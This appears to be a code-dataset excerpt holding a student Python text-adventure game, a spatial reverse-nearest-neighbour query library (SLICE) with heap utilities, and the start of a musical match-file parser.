return action
def ask_action(username, my_input):
"""
This function will generate a set list of prompts based upon the my_input variable.
:param username: Utilizes the users name in the print functions.
:param my_input: Allows the user to input a finite selection of options to further the program.
:return: N/A
"""
if my_input == "sleep" or my_input == "Sleep":
# Good choice
sleep(delay)
print("Amazing! Good job, ", username, "! You have found their weakness! Goblins can't see sleeping people...")
sleep(delay)
print("As you awake, you notice some golden coins one of the goblins left behind.")
sleep(delay)
elif my_input == "do nothing" or my_input == "Do nothing":
# Bad choice
print("Do nothing? YOU DIE!!!!")
sleep(delay)
if dead:
print("Oh no! You died. Better luck next time! Try again by hitting the green play button. ")
kill_if_dead(dead)
elif my_input == "fight" or my_input == "Fight":
print("You have proved so brave", username, ". Go on with your journey!")
elif my_input == "jump" or my_input == "Jump":
print("At the bottom of this cliff lies waves of fast flowing water. Jumping was not a good choice!")
else:
print("The choice you entered is not available. Please enter a valid choice.")
# Finished, yay!
def team_4_adv():
pass
# TODO Add your code here
def test_the_rainbow(flavor):
"""
Editors: <NAME>
<NAME>
Function takes the input given by the user and checks to see if it is similar to one of the three options given.
If it isn't, it returns "True" so the question can be repeated.
:return: True
"""
if len(flavor) == 9 and flavor[0] == "s" and flavor[8] == 'y':
# Good choice!
print("Good choice!This makes you feel a lot better")
print("considering your friend disappeared mysteriously the other day.\n")
sleep(delay)
elif len(flavor) == 10 and flavor[0] == "p" and flavor[9] == 'o':
# Neutral choice
print("You feel a tingling sensation in your throat, and you start puking blood and pistachios.")
print("As everything starts going black, you vaguely hear evil laughter. ")
print("The ice cream van starts up and a merry song starts playing and slowly fades away \n")
elif len(flavor) == 9 and flavor[0] == "c" and flavor[8] == 'e':
# Oh... Bad choice
print("Here you go, this is a van favorite!")
sleep(delay)
print("Oh it tastes so familiar but not in a good way")
print("At first you don't realize it but then you start feeling nauseous")
print("You start vomiting and ask 'What the hell was that?'")
print("The ice cream people tells you: Don't worry! It's just your friend! \n")
# Kill the player and end the program if this choice is made
kill_if_dead(True)
else:
return True
def team_5_adv():
"""
######################################################################
# Assignment: T04: Adventure in Gitland
# Editors: <NAME>
# <NAME>
# Google Doc: https://docs.google.com/document/d/1icOBu4PV5DDGkWtmThEnmaj2JaOW1aoW9Yujh0_caLo/edit?usp=sharing
######################################################################
:return:
"""
typo = True
while typo == True:
flavor = input("Which flavor would you like? [Strawberry/Pistachio/Chocolate]")
print()
flavor.lower()
typo = test_the_rainbow(flavor)
if typo == True:
print("Looks like the answer you provided isn't close to your choices")
sleep(delay)
print("Please try again unless you want to be stuck here forever... \n")
def team_6_adv():
pass
# TODO Add your code here
def team_7_adv():
"""
https://docs.google.com/document/d/1Dh_Zd3X9bS8DijgocvDM0IqgX9UTT2eTzIUM_Pj_I-U/edit?ts=5d7ba1f3#heading=h.f6tumop9n7at
:return: None
"""
global dead
direction = input("Which direction would you like to go? [Right/Forward/Backward/Left]")
direction = direction.lower() #changes the user's input to lowercase
if direction == "right":
# Good Choice!
print("You rush into the nearby trees for cover. There you find a mystical coconut that will slay the dragon.")
sleep(delay)
elif direction == "forward":
# Bad Choice
integer = int(
input(
"You have made a bad choice! You have one more chance to avoid being burnt alive. Pick a number."))
if integer <= 50:
print("You have saved yourself and spared yourself from the dragon!")
elif integer > 50:
print("You failed to make a better decision and gave the dragon time to get the BBQ sauce.")
print("You have decided to run towards the dragon. The dragon scoffs and burns you to a crisp.")
dead = True
kill_if_dead(dead)
sleep(delay)
else:
pass
# Oh...Bad Choice
print("You reach the end of the cave uneventfully. Continue on!")
def team_8_adv():
"""
https://docs.google.com/document/d/1_Qj83TBpX5Doe6TMSEJ5TJ3kR8oNaE6qu6pPN4iCceA/edit?usp=sharing
:return:
"""
# TODO Add your code here
#######################################################################################
# eubanksn and mualcinp
# T04
# Fixing code
######################################################################################
# TODO Team 8
sleep(delay)
username = input("Who are you?")
print()
print("Thum.. Thum.. Thum.. You hear footsteps approaching.")
sleep(delay * 2)
print("Hello,", username, "I am the spirit of this cave. Here, take some food to help you with your journey.")
choice = input("Take the food? [yes/no]")
choice = choice.lower()
if choice == "yes":
print("You took the food and ate it. Now you have enough energy to continue on your journey.")
sleep(delay)
print("Congratulations! You made a wise choice.")
elif choice == "no":
second_choice = int(input(
"\nOkay, you don't have to eat all the food but you must take some bites. How many bites are you going to "
"take? [0-200]"))
while True:
if second_choice >= 0:
if second_choice > 100:
print("\nYou ate too much and exploded, you gluttonous fiend!")
deceased = True
elif second_choice == 0:
print("\nYou get hungry and your energy level drops. You pass out.")
deceased = True
elif 100 >= second_choice > 0:
print("\nYou took the food and ate it. Now, you have enough energy to continue on your journey.")
print("Congratulations! You made a wise choice.")
break
second_choice = int(input(
"That is not possible. Now, lets try again. How many bites would you like to take? Input a number from "
"0-200 this time. "))
else:
print("Enter either 'yes' or 'no'. The spirit of the cave would not take any other answers.")
if deceased:
print("A bear comes across your mangled, exploded body. You wake up dead.")
quit()
# TODO Don't forget to check if your user is dead at the end of your chapter!
def team_9_adv():
######################################################################
# Author: <NAME> & <NAME>
# Username: Wellst & Millerd2
#
# Assignment: T04: Adventure in Gitland
#
# Google docs: https://docs.google.com/document/d/1tQqF_Y0WmdpPVzTq3wAzf5_kX4x5tzHtdvdRv92qHp8/edit?usp=sharing
######################################################################
death = False
print("You see a dim light glowing behind a loose boulder. Do you choose to investigate?")
choice = input("[Yes/no/leave]")
sleep(delay)
if choice == "Yes":
print("You place your hand against the boulder and it dissipates into the air like fine mist. Behind it you")
print("see a giant sword bigger than most men.")
sleep(delay)
print("A giant humanoid creature enters your view and begins to grab the sword.")
sleep(delay * 2)
print("He swings the sword in your direction causing the timid ceiling to collapse in between you saving ")
print("yourself from the giant beast. ")
print("You are safe for now, and you begin to search for a way out..")
#
#
sleep(delay)
elif choice == "no":
print("You choose to hastily run away from the boulder and you begin to lose your footing.")
sleep(delay)
print("You trip and fall forward breaking your neck in the most boring possible fashion")
death = True
else:
print("You decide against your gut and move away from the glowing boulder.")
sleep(delay)
print("You leave the cave by following the sounds of wilderness outside. You begin to hear some disgruntled")
print("shuffling in the cave as you leave.")
kill_if_dead(death)
pass
def team_10_adv():
# Google Doc: https://docs.google.com/document/d/1XwjthTBbExLqfs_fXTbGp70kUGsyPTzwsMwP5XOjrJ4/edit?usp=sharing
# TODO Team 10
# Beginning of the Amulet Encounter Chapter
global dead
print()
print("You are in a room with strange symbols all over the walls.")
print("Looking at the eldritch markings makes your head hurt just by looking at them.")
print("You see an amulet floating in the middle of the room over a pedestal.")
print()
amuletAction = input("What do you want to do? [Wear/Ignore/Destroy]")
print()
if amuletAction == "Wear" or "wear" or "WEAR":
# Bad choice
print("Nothing happens... ")
sleep(delay * 3)
print("...")
sleep(delay * 3)
print("You feel strange, your hands starts twitching uncontrollably.")
print("You start walking back into the darkness, not in control of your own actions.")
# Begin Test of Wills
print()
print("You're body is under new management at the moment.")
print("The walls begin to morph, forming words you can comprehend, requesting a number.")
amuletSave = input("What is The Ultimate Answer to Life, The Universe and Everything?")
if int(amuletSave) == 42:
print()
print("Your body starts responding again.")
print("You seem to have shaken off the evil manipulation.")
print("Harrowed by your brush with death, you carry on, deeper into the labyrinth")
elif 41 <= int(amuletSave) <= 43:
print()
print("Close enough!")
print("You shake off the control with moments to spare and come to your senses.")
print("You twitch one last time and run for you life, towards (unlikely) safety...")
else:
print("INCORRECT MORTAL!!!")
print("NOW DIE FOR YOUR IGNORANCE!")
dead = True
elif amuletAction == "Destroy" or "destroy" or "DESTROY":
# Good option
print("As you cast the amulet into some previously un-narrated lava, you feel watched by a giant eye.")
print("As the amulet disintegrated, you feel a cursed being lifted from the Median-Earth.")
print("Satisfied with your good deed for the day you carry on deeper into the labyrinth...")
print()
elif amuletAction == "Ignore" or "ignore" or "IGNORE":
# Boring option
print("So you ignore the floating mystical artifact in the middle of the room.")
print(
"We went through all of the trouble in making a cool, levitating, magic item for you and you ignore it...")
print("Way to go, you hurt our creative pride.")
print("Well, I guess you can carry on, further deeper into the depths of the labyrinth...")
print("Away from anything fun...")
print()
else:
# Just in case option
print("Somehow, our scenario wasn't interesting enough for you to even answer properly.")
print("Whatever you just did somehow broke the laws of causality and you glitch")
print("through a lamp using a backwards long jump and end up in a parallel dimension in another room...")
print()
if dead == True:
print("Congratulations! You've been possessed by an ancient evil!")
print("Don't mess with cursed objects kids!")
print("Better luck next time! Try again by hitting the green play button in the top right. ")
kill_if_dead()
print()
print()
def team_11_adv():
pass
# TODO Add your code here
# This is the start of team twelve's work.
def choosing(choice2):
""" this function present the user with the yes or no choice. Yes: progress, No:dead
"""
if choice2 == "yes":
print("Great you refilled your health ")
elif choice2 == "no":
print("you die from starvation?!")
sleep(delay)
dead()
else:
# neutral choice
print("you later found berries in the dark hall")
def choosing1(choice3):
"""This function gives you two choices, one opens the door, the other is death
"""
if 0 < choice3 <= 10:
print("A door opens")
elif choice3 > 10:
print(" You fall to your death")
dead()
def team_12_adv():
""" This is Imma and Sama's part of the adventure. Enjoy!
here's our google doc: https://docs.google.com/document/d/1vQBVi9MWeufUl-xCIQGYaNfP7oAsKXdWE0a3dMO0pmo/edit?usp=sharing
"""
# def choosing(choice):
# def dead():
# quit()
print("You walk into a room and see a glass of milk sitting on a table. Do you drink it?)")
choice1 = input("[yes/no] ")
choosing(choice1)
sleep(1)
print("In the dark hall you see a libra scale. You have to set the scale equal to a bar of silver.")
choice = int(input("Pick a number"))
choosing1(choice)
# TODO Don't forget to check if your user is dead at the end of your chapter!
#########################################################################################################
# TODO Add your code here
def team_13_adv():
sleep(delay * 3)
global dead
print("")
print("")
print("It seems like you will be here a while.")
print("You see two doors in front of you. One is made of wood. It looks like it is about to fall off.")
print("The other door is just plants. All you gotta do is walk through and you're on the other side. ")
print("There is also a doorway with no door. ")
choice = input("Where will you go? [Wood/Plant/No door] ")
if choice == "Wood":
print("As you push the door open, it falls off. ")
print("The loud noise wakes up the polar bear sleeping inside. It then proceeds to devour you with salt.")
dead = True
elif choice == "Plant":
print("You brush the plants to the side and walk through the doorway.")
print("This opens up a secret path. You follow this path for hours.")
print(" You somehow ended up at the same doorways that you encountered earlier.")
elif choice == "No door":
print(" You walk through the doorway and you see a faint light in the distance. You run to this light.")
print("You discover a chest. You open the chest and find food and water in the chest!.")
print("After eating, you continue to walk on and eventually find the Exit. ")
print("You are free!")
if dead:
print("You have been eaten by the polar bear!")
kill_if_dead(dead)
pass
# TODO Add your code here
####################################################################################################################
def team_14_adv():
"""
Google Drive: https://docs.google.com/document/d/1hVrBRHrbbXxCU74zEOyzQhHAzuYbB5O3eAddp6hoWnw/edit?usp=sharing
Partner 1: <NAME>
Partner 2: <NAME>
:return:
"""
global dead
print("\nYou stumble into the woods. \nThere are three paths in front of you.\n")
answer = input( "Which direction do you want to go? [North (N) /East (E) /West(W)] ")
if answer.lower() == "north" or answer.lower() == "n":
# Bad choice
print("\n You are being chased by wolves.")
sleep(1)
print("Try to run away! Good luck!")
sleep(1)
safe = input("How long do want to run? [1-10]")
try:
a = int(safe)
if int(safe) >= 7:
print("\nThe wolves get tired of chasing you.")
else:
print("Oh no. They caught you.")
except ValueError:
print("\nOh no. They caught you.")
dead = True
elif answer.lower() == "west" or answer.lower() =="w":
# Good choice
print("You stumbled into a clearing. \nYou escape the woods.")
elif answer.lower() == "east" or answer.lower() == "e":
# Neutral choice
print("The path leads you deeper into the woods. \nYou are now lost.")
else:
print("You can't think clearly. \nYou sit there for eternity.")
dead = True
if dead:
kill_if_dead(dead)
else:
print("Keep going. You are still alive.")
############################################################################################################
def team_15_adv():
"""
https://docs.google.com/document/d/1vE7M-wYzNrrqdWcMP472itZB_IBkW2anDfiU1cYA3Sk/edit?usp=sharing
:return:
"""
global dead
# TODO Add your code here
#########################################################################################################
# TODO Team 15
######################################################################
# Author: <NAME>, <NAME>
# Username: mastriyanag, AlexMeadors
#
# Assignment: T04: Adventure in Gitland
#
# Purpose: To recreate a choose-your-own-adventure style game
# by refactoring T01.
#
# Each "twist" in the story is from a different group. The resulting story
# will either be incoherently random, or entertainingly "Mad Lib" like.
# Either way, it should be fun!
#
# This new version will take advantage of functions, as well as
# demonstrate the value of git as a tool for collaborating.
######################################################################
# Acknowledgements:
# Original Author: <NAME>
#
######################################################################
messages = ["You come upon three doors.", "The one on the left has a light glowing from underneath.",
"The one in the middle looks old and cracked.", "The one on the right is made of rusted metal."]
for i in messages:
print(i)
sleep(delay * 3)
direction = input("Which door will you choose? [Left, Middle, Right]")
if direction.lower() == "right":
# Good choice
print(
"You can barely see because the room is so dark and dusty. "
"\nYou light your torch and see the room is filled to the brim with gold and jewels!.")
sleep(delay * 4)
print("Congratulations, you're rich!")
choice = 0
elif direction.lower() == "left":
# Worst choice
print(
"You step through the door onto a thin sheet of ice. Below the ice, electricity arcs from one "
"electric eel to another.\nYou turn quickly to walk back out the door and...")
sleep(delay * 3)
print("A golden dragon appears, he offers to help if and only if you can guess a number between 1 to 10")
number = input("What number do you choose?")
dragon_guess = False
for i in range(5):
if ord(number[0]) == (54 + i) or (ord(number[0]) == 49 and (ord(number[-1]) == 48) and (len(number) == 2)):
dragon_guess = True
if dragon_guess:
print("He offers you a ride to safety, you come out with no major injuries.")
choice = 2
# Death
else:
print("The ice breaks! You are electrocuted while you are drowned... ")
dead = True
choice = 1
else:
# Boring choice
messages = ["You open the middle door. Behind the door you find a long passage with stairs that seem to go up"
" forever.", "...", "....", ".....",
"You realize this tunnel is leading to nowhere and close your eyes, wishing for an escape."]
for i in messages:
print(i)
sleep(delay * 2)
choice = 2
choicestrings = ["You collect your treasure and you move on to the next part of the cave",
"You die, try again to test your fate again!",
"You open your eyes and you are in a new place. You are alive, but somewhat bored and disappointed."]
print(choicestrings[choice])
kill_if_dead(dead)
def check_if_exist(string):
"""
Checks to see if the direction the user choose exists, and if it does it continues the story line.
:param string:
"""
global dead
available_inputs = ["right", "left", "backwards", "forwards"] # Directions the user can choose
given_input = string.lower()
if given_input in available_inputs:
if given_input == "right":
# Good Choice!
print("You rush into the nearby trees for cover. There you find a mystical coconut that will slay the"
+ " dragon.")
sleep(delay)
elif given_input == "forwards":
# Bad Choice
# print("You almost made a bad choice! The dragon hasn't seen you yet! Pick a number.")
integer = int(
input(
"You have made a bad choice! You have one more chance to avoid being burnt alive. Pick a "
+ "number. [1,2]"))
if integer == 1:
print("You have saved yourself and spared yourself from the dragon!")
elif integer == 2:
print("You failed to make a better decision and gave the dragon time to get the BBQ sauce.")
print("You have decided to run towards the dragon. The dragon scoffs and burns you to a crisp.")
dead = True
sleep(delay * 2)
# Finished!
else:
# Oh...Bad Choice
print("You just got eaten by man-eating roaches!")
sleep(delay * 2)
print("Try to pick another direction to follow next time!")
dead = True
# Finished the user has died!
else:
print("I do not exist, choose another direction...")
ask()
def ask():
"""
asks a question about which direction the user wants to go
"""
x = input("Which direction would you like to go? [Right/Forwards/Backwards/Left]")
check_if_exist(x)
def team_16_adv():
######################################################################################################
# Author: <NAME> and <NAME>
# Username: garrettz and morenoa
# Assignment: T04_Adventures in Gitland
# Google Drive Link: smallyourl.appspot.com/B5odmlCDM
# Acknowledgements:
######################################################################################################
global dead # If user chooses wrong direction they will die
ask()
if dead:
print("Oh no! You died. Better luck next time! Try again by hitting the green play button.")
quit()
def team_17_adv():
pass
# TODO Add your code here
def team_18_adv():
pass
# TODO Add your code here
def team_19_adv():
pass
# TODO Add your code here
def team_20_adv():
pass
# TODO Add your code here
def main():
"""
The main function, where the program starts.
:return: None
"""
user = start_story()
paths = [scott_adventure, team_1_adv, team_2_adv,
team_3_adv, team_4_adv, team_5_adv,
team_6_adv, team_7_adv, team_8_adv,
team_9_adv, team_10_adv, team_11_adv,
team_12_adv, team_13_adv, team_14_adv,
team_15_adv, team_16_adv, team_17_adv,
team_18_adv, team_19_adv, team_20_adv]
random.shuffle(paths) # Shuffles the order of paths, so each adventure is different
for i in range(len(paths)):
paths[i]() # Runs each function in the paths list
end_story(user)
main()
``` |
{
"source": "2019ly/CSD",
"score": 3
} |
#### File: CSD/common/__init__.py
```python
from heapq import heappop, heappush, heappushpop, heapify, _heapify_max, _heappushpop_max, _siftdown_max, _siftup_max
from collections import Iterable
from math import cos, ceil, pi, sin
from shapely.geometry import Polygon, Point
def circle(o, r, resolution=None):
if r <= 0:
raise ValueError("r must be a number greater than 0")
if resolution:
return o.buffer(r, int(ceil(pi * r * 2 / resolution / 4)))
else:
return o.buffer(r, 32)
def sector(o, r, angles, resolution=None):
c = circle(o, r, resolution)
if abs(angles[0] - angles[1]) >= pi:
raise ValueError('abs(angles[0] - angles[1]) must be less than Pi')
l = r / cos(abs(angles[0] - angles[1]) / 2)
triangle = Polygon(
[(o.x, o.y), (o.x + cos(angles[0]) * l, o.y + sin(angles[0]) * l),
(o.x + cos(angles[1]) * l, o.y + sin(angles[1]) * l)])
s = triangle.intersection(c)
s.o = o
s.r = r
s.angles = angles
return s
def partitions(origin, space, n):
bounds = space.bounds
r = Point((bounds[0], bounds[1])).distance(Point((bounds[2], bounds[3])))
return [sector(origin, r, [2 * pi / n * i, 2 * pi / n * (i + 1)]) for i in range(n)]
def heappush_max(heap, item):
heap.append(item)
_siftdown_max(heap, 0, len(heap) - 1)
def heappop_max(heap):
last = heap.pop()
if heap:
return_item = heap[0]
heap[0] = last
_siftup_max(heap, 0)
else:
return_item = last
return return_item
class MinHeap(Iterable):
def __init__(self):
self.items = []
def pop(self):
return heappop(self.items)
def push(self, item):
heappush(self.items, item)
def first(self):
if len(self.items) > 0:
return self.items[0]
else:
return None
smallest = first
def __len__(self):
return len(self.items)
def __iter__(self):
for i in self.items:
yield i
class MaxHeap(Iterable):
def __init__(self):
self.items = []
def pop(self):
return heappop_max(self.items)
def push(self, item):
heappush_max(self.items, item)
def first(self):
if len(self.items) > 0:
return self.items[0]
else:
return None
largest = first
def __len__(self):
return len(self.items)
def __iter__(self):
for i in self.items:
yield i
class NSmallestHolder:
def __init__(self, n):
self.items = []
self.n = n
def push(self, item):
if len(self.items) < self.n:
self.items.append(item)
if len(self.items) == self.n:
_heapify_max(self.items)
else:
_heappushpop_max(self.items, item)
def first(self):
if len(self.items) > 0:
return self.items[0]
else:
return None
largest = first
def __len__(self):
return len(self.items)
def __iter__(self):
for i in self.items:
yield i
class NLargestHolder:
def __init__(self, n):
self.items = []
self.n = n
def push(self, item):
if len(self.items) < self.n:
self.items.append(item)
if len(self.items) == self.n:
heapify(self.items)
else:
heappushpop(self.items, item)
def first(self):
if len(self.items) > 0:
return self.items[0]
else:
return None
smallest = first
def __len__(self):
return len(self.items)
def __iter__(self):
for i in self.items:
yield i
def plot_points(ax, data, color, size, label):
x = [geom.x for id, geom in data]
y = [geom.y for id, geom in data]
ax.plot(x, y, '.', markersize=size, color=color, label=label)
def plot_stars(ax, data, color, size, label):
x = [geom.x for id, geom in data]
y = [geom.y for id, geom in data]
ax.plot(x, y, '*', markersize=size, color=color, label=label)
```
#### File: CSD/RkNN/SLICE.py
```python
from math import cos, pi, sin, acos
from time import time
from numpy.linalg import norm
from shapely.geometry import Point
import numpy as np
import common
def MonoRkNN(q_id, k, index, with_statistics=False):
partition_num = 12
begin_time = time()
q = index.geometries[q_id]
sigLists, unpruned_area, pruning_io = pruning(q_id, q, k + 1, index, partition_num)
pruning_io += 1
pruning_time = time()
result, verification_io, candidate_num = mono_verification(q, k, sigLists, unpruned_area)
verification_time = time()
verified_candidate_num = candidate_num
if with_statistics:
return result, pruning_time - begin_time, verification_time - pruning_time, pruning_io, verification_io, candidate_num, verified_candidate_num
else:
return result
def mono_verification(q, k, sigLists, unpruned_area):
result = list()
candidates, IO = mono_retrieve_candidates(sigLists, unpruned_area)
sigLists = [sorted(s, key=lambda c: c[0]) for s in sigLists]
for candidate in candidates:
if mono_is_RkNN(q, candidate[0], candidate[1], k, sigLists):
result.append(candidate)
return result, IO, len(candidates)
def mono_is_RkNN(q, candidate_id, candidate, k, sigLists):
i = sector_id(candidate, q, len(sigLists))
count = 0
sigList = sigLists[i]
for r_l, f_id, f in sigList:
if candidate_id == f_id:
continue
if candidate.distance(q) < r_l:
return True
if candidate.distance(f) < candidate.distance(q):
count += 1
if count >= k:
return False
return True
def mono_retrieve_candidates(sigLists, unpruned_area):
candidates = list()
visited = set()
for sigList in sigLists:
for r_l, f_id, f in sigList:
if f_id not in visited:
visited.add(f_id)
if unpruned_area.intersects(f):
candidates.append((f_id, f))
return candidates, 0
def BiRkNN(q_id, k, facility_index, user_index, with_statistics=False):
partition_num = 12
begin_time = time()
q = facility_index.geometries[q_id]
sigLists, unpruned_area, pruning_io = pruning(q_id, q, k, facility_index, partition_num)
pruning_io += 1
pruning_time = time()
result, verification_io, candidate_num = bi_verification(q, k, user_index, sigLists, unpruned_area)
verification_time = time()
verified_candidate_num = candidate_num
if with_statistics:
return result, pruning_time - begin_time, verification_time - pruning_time, pruning_io, verification_io, candidate_num, verified_candidate_num
else:
return result
def pruning(q_id, q, k, index, partition_num):
partitions = common.partitions(q, index.space, partition_num)
sigLists = [[] for i in range(partition_num)]
upper_arc_radius_heaps = [common.MaxHeap() for i in range(partition_num)]
shaded_areas = [calculate_shaded_area(partition, partition.r) for partition in partitions]
h = common.MinHeap()
IO = 0
h.push((0, index.root))
while len(h) > 0:
e_dist, e = h.pop()
if may_contains_significant_facility(e, shaded_areas):
if e.is_data_node:
pruneSpace(q_id, e, k, partitions, sigLists, upper_arc_radius_heaps, shaded_areas)
else:
for child in e.children:
h.push((child.geom.distance(q), child))
IO += 1
unpruned_area_list = list()
for i in range(partition_num):
r_b = min(upper_arc_radius_heaps[i].first(), partitions[i].r)
angles = [2 * pi / partition_num * i, 2 * pi / partition_num * (i + 1)]
if r_b > 0:
unpruned_area_list.append(common.sector(q, r_b, angles).buffer(0.01))
unpruned_area = reduce(lambda x, y: x.union(y), unpruned_area_list)
return sigLists, unpruned_area, IO
def pruneSpace(q_id, e, k, partitions, sigLists, upper_arc_radius_heaps, shaded_areas):
f_id = e.obj
if f_id == q_id:
return
f = e.geom
for i in range(len(partitions)):
partition = partitions[i]
sigList = sigLists[i]
upper_arc_radius_heap = upper_arc_radius_heaps[i]
min_angle, max_angle = min_and_max_angle(f, partition)
if min_angle < pi / 2:
r_l, r_u = lower_and_upper_arc_radius(f, partition)
bounding_arc_radius = float('inf')
if len(upper_arc_radius_heap) < k or r_u < upper_arc_radius_heap.first():
upper_arc_radius_heap.push(r_u)
if len(upper_arc_radius_heap) > k:
upper_arc_radius_heap.pop()
if len(upper_arc_radius_heap) == k:
bounding_arc_radius = upper_arc_radius_heap.first()
shaded_areas[i] = calculate_shaded_area(partition, bounding_arc_radius)
if is_significant_facility(f, partition, bounding_arc_radius):
sigList.append([r_l, f_id, f])
def bi_verification(q, k, index, sigLists, unpruned_area):
result = list()
candidates, IO = bi_retrieve_candidates(index, unpruned_area)
sigLists = [sorted(s, key=lambda c: c[0]) for s in sigLists]
for candidate in candidates:
if bi_is_RkNN(q, candidate[1], k, sigLists):
result.append(candidate)
return result, IO, len(candidates)
def bi_retrieve_candidates(index, unpruned_area):
candidates = list()
IO = 0
entries = {index.root}
IO += 1
while len(entries) > 0:
e = entries.pop()
if unpruned_area.intersects(e.geom):
if e.is_data_node:
candidates.append((e.obj, e.geom))
else:
for child in e.children:
entries.add(child)
IO += 1
return candidates, IO
def bi_is_RkNN(q, u, k, sigLists):
i = sector_id(u, q, len(sigLists))
count = 0
sigList = sigLists[i]
for r_l, f_id, f in sigList:
if u.distance(q) < r_l:
return True
if u.distance(f) < u.distance(q):
count += 1
if count >= k:
return False
return True
def is_significant_facility(f, partition, bounding_arc_radius):
if partition.contains(f):
if f.distance(partition.o) > 2 * bounding_arc_radius:
return False
else:
M, N = get_M_N(partition, bounding_arc_radius)
if M.distance(f) > bounding_arc_radius and N.distance(f) > bounding_arc_radius:
return False
return True
def may_contains_significant_facility(e, shaded_areas):
for area in shaded_areas:
if area.intersects(e.geom):
return True
return False
def calculate_shaded_area(partition, bounding_arc_radius):
if bounding_arc_radius == 0:
return partition.origin
if bounding_arc_radius == float('inf'):
bounding_arc_radius = partition.r
sector = common.sector(partition.o, bounding_arc_radius * 2, partition.angles)
m, n = get_M_N(partition, bounding_arc_radius)
circle_m = common.circle(m, bounding_arc_radius)
circle_n = common.circle(n, bounding_arc_radius)
return sector.union(circle_m).union(circle_n)
def get_M_N(partition, bounding_arc_radius):
o = partition.o
if bounding_arc_radius == float('inf'):
l = partition.r
else:
l = bounding_arc_radius
angles = partition.angles
M = Point(cos(angles[0]) * l + o.x, sin(angles[0]) * l + o.y)
N = Point(cos(angles[1]) * l + o.x, sin(angles[1]) * l + o.y)
return M, N
def min_and_max_angle(f, partition):
o = (partition.o.x, partition.o.y)
p1 = [o[0] + cos(partition.angles[0]), o[1] + sin(partition.angles[0])]
p2 = [o[0] + cos(partition.angles[1]), o[1] + sin(partition.angles[1])]
angles = [angle(o, p1, f), angle(o, p2, f)]
return sorted(angles)
def lower_and_upper_arc_radius(f, partition):
min_angle, max_angle = min_and_max_angle(f, partition)
dist_f_o = f.distance(partition.o)
if max_angle >= pi / 2:
r_u = float('inf')
else:
r_u = dist_f_o / (2 * cos(max_angle))
r_l = dist_f_o / (2 * cos(min_angle))
return r_l, r_u
def angle(o, x, y):
x = np.asarray(x)
y = np.asarray(y)
o = np.asarray(o)
vector_ox = x - o
vector_oy = y - o
norm_ox = norm(vector_ox)
norm_oy = norm(vector_oy)
if norm_ox == 0 or norm_oy == 0:
return 0
return acos(vector_ox.dot(vector_oy) / (norm_ox * norm_oy))
def sector_id(p, origin, sector_num):
return int(angle_with_x(origin, p) / (2 * pi / sector_num))
def angle_with_x(p_start, p_end):
dist = p_start.distance(p_end)
if dist == 0:
return 0
if p_end.y - p_start.y >= 0:
return acos((p_end.x - p_start.x) / dist)
else:
return 2 * pi - acos((p_end.x - p_start.x) / dist)
``` |
{
"source": "2019paper/Symbolic-Melody-Identification",
"score": 3
} |
#### File: extra/data_handling/matchfile.py
```python
import re
import operator
import numpy as np
import codecs
from ..utils.lang_utils import cached_property
####################################################################
rational_pattern = re.compile('^([0-9]+)/([0-9]+)$')
def interpret_field(data):
"""
Convert data to int, if not possible, to float, otherwise return
data itself.
:param data: some data object
:returns:
"""
try:
return int(data)
except ValueError:
try:
return float(data)
except ValueError:
return data
class ParseRationalException(Exception):
def __init__(self,string):
self.string = string
def __str__(self):
return 'Could not parse string "{0}"'.format(self.string)
class Ratio:
def __init__(self,string):
try:
self.numerator,self.denominator = [int(i) for i in string.split('/')]
except:
raise ParseRationalException(string)
def interpret_field_rational(data, allow_additions = False):
"""Convert data to int, if not possible, to float, if not possible
try to interpret as rational number and return it as float, if not
possible, return data itself."""
global rational_pattern
v = interpret_field(data)
if type(v) == str:
m = rational_pattern.match(v)
if m:
groups = m.groups()
return float(groups[0])/float(groups[1])
else:
if allow_additions:
parts = v.split('+')
if len(parts) > 1:
iparts = [interpret_field_rational(i, allow_additions = False) for i in parts]
# to be replaced with isinstance(i,numbers.Number)
if all(type(i) in (int, float) for i in iparts):
return sum(iparts)
else:
return v
else:
return v
else:
return v
else:
return v
###################################################
def pitch_name_2_midi_PC(modifier, name, octave):
if name == 'r':
return (0, 0)
base_class = ({'c':0,'d':2,'e':4,'f':5,'g':7,'a':9,'b':11}[name.lower()] +
{'b':-1,'bb':-2,'#':1,'x':2,'##':2,'n':0}[modifier])
mid = (octave + 1) * 12 + base_class
#for mozartmatch files (in which the octave numbers are off by one)
#mid = octave*12 + base_class
pitchclass = base_class % 12
return (mid, pitchclass)
class MatchLine(object):
"""
A class that represents a line in a match file. It is intended
to be subclassed. It's constructor sets up a list of field names
as object attributes.
"""
field_names = []
re_obj = re.compile('')
def __str__(self):
r = [self.__class__.__name__]
for fn in self.field_names:
r.append(' {0}: {1}'.format(fn,self.__dict__[fn]))
return '\n'.join(r)+'\n'
def __init__(self, match_obj, field_interpreter = interpret_field_rational):
self.set_attributes(match_obj, field_interpreter)
@classmethod
def match_pattern(self,s, pos = 0):
"""
Return a regular expression match object that matches the
pattern to the given string, or None if no match was found
:param s: the string to be matched
:returns: match object, or None
"""
return self.re_obj.search(s, pos = pos)
def set_attributes(self, match_obj, field_interpreter = lambda x: x):
"""
Set attribute objects using values from a regular expression
match object; use `field_interpreter` to interpret the
attribute value strings as integers, floats, strings, etc.
:param match_obj: regular expression match object
:param field_interpreter: function that returns an object given a string
"""
groups = [field_interpreter(i) for i in match_obj.groups()]
if len(self.field_names) == len(groups):
for (a,v) in zip(self.field_names,groups):
setattr(self,a,v)
class UnknownMatchLine(MatchLine):
"""
A dummy class that represents a line that does not fit to any
specified pattern
"""
def __init__(self,line):
self.line = line
class Note(MatchLine):
"""
Class representing the played note part of a match line
"""
field_names = ['Number','NoteName','Modifier','Octave',
'Onset','Offset','AdjOffset','Velocity' ]
pattern = 'note\(([^,]+),\[([^,]+),([^,]+)\],([^,]+),([^,]+),([^,]+),([^,]+),([^,]+)\)'
re_obj = re.compile(pattern)
def __init__(self, m):
MatchLine.__init__(self, m)
self.MidiPitch = pitch_name_2_midi_PC(self.Modifier, self.NoteName, self.Octave)
class TrailingNoteLine(MatchLine):
"""
Class representing a Trailing Note line
"""
field_names = ['Number','NoteName','Modifier','Octave',
'Onset','Offset','AdjOffset','Velocity' ]
pattern = 'note\((.+),\[(.+),(.+)\],(.+),(.+),(.+),(.+),(.+)\)'
re_obj = re.compile(pattern)
def __init__(self, m):
self.note = Note(m)
class Snote(MatchLine):
"""
Class representing the score note part of a match line
"""
field_names = ['Anchor','NoteName','Modifier','Octave',
'Bar','Beat','Offset','Duration',
'OnsetInBeats','OffsetInBeats','ScoreAttributesList']
